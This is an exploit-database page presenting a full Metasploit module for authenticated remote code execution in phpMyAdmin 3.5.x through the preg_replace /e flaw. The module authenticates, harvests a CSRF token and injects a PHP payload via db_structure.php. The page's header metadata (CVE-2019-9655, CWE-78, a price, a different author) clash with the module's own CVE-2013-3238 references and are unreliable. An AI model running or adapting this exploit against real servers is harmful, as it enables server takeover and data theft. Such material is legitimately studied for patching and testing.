Exploitalert - Database of Exploits

phpMyAdmin 3.5.8 Authenticated Remote Code Execution Exploit

CVE	Category	Price	Severity
CVE-2019-9655	CWE-78	$5,000	High

Author	Risk	Exploitation Type	Date
Egil Hjelmeland	Critical	Remote	2013-04-30

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	Low	PR	The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

http://cxsecurity.com/ascii/WLB-2013040203

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Description' => %q{ This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3. PHP versions > 5.4.6 are not vulnerable. }, 'Author' => [ 'Janek "waraxe" Vind', # Discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3238' ], [ 'PMASA', '2013-2'], [ 'waraxe', '2013-SA#103' ], [ 'EDB', '25003'], [ 'OSVDB', '92793'], [ 'URL', 'http://www.waraxe.us/advisory-103.html' ], [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload' => { 'BadChars' => "&\n=+%", # Clear out PMA's error handler so it doesn't lose its mind # and cause ENOMEM errors and segfaults in the destructor. 'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);" }, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 25 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']), OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) ], self.class) end def check begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') }) rescue print_error("Unable to connect to server.") return CheckCode::Unknown end if res.code != 200 print_error("Unable to query /js/messages.php") return CheckCode::Unknown end php_version = res['X-Powered-By'] if php_version print_status("PHP Version: #{php_version}") if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/ if $1.to_i > 5 return CheckCode::Safe else if $1.to_i == 5 and $2.to_i > 4 return CheckCode::Safe else if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6 return CheckCode::Safe end end end end else print_status("Unknown PHP Version") end if res.body =~ /pmaversion = '(.*)';/ print_status("phpMyAdmin version: #{$1}") case $1.downcase when '3.5.8.1', '4.0.0-rc3' return CheckCode::Safe when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2' return CheckCode::Vulnerable else if $1.starts_with? '3.5.' return CheckCode::Vulnerable end return CheckCode::Unknown end end end def exploit uri = target_uri.path print_status("Grabbing CSRF token...") response = send_request_cgi({ 'uri' => uri}) if response.nil? fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") end if (response.body !~ /"token"\s*value="([^"]*)"/) fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?") else print_good("Retrieved token") end token = $1 post = { 'token' => token, 'pma_username' => datastore['USERNAME'], 'pma_password' => datastore['PASSWORD'] } print_status("Authenticating...") login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'vars_post' => post }) if login.nil? fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") end token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first cookies = login.get_cookies login_check = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'token' => token }, 'cookie' => cookies }) if login_check.body =~ /Welcome to/ fail_with(Exploit::Failure::NoAccess, "Authentication failed.") else print_good("Authentication successful") end db = rand_text_alpha(3+rand(3)) exploit_result = send_request_cgi({ 'uri'=> normalize_uri(uri, 'db_structure.php'), 'method' => 'POST', 'cookie' => cookies, 'vars_post' => { 'query_type' => 'replace_prefix_tbl', 'db' => db, 'selected[0]' => db, 'token' => token, 'from_prefix' => "/e\0", 'to_prefix' => payload.encoded, 'mult_btn' => 'Yes' } },1) end end

Impressum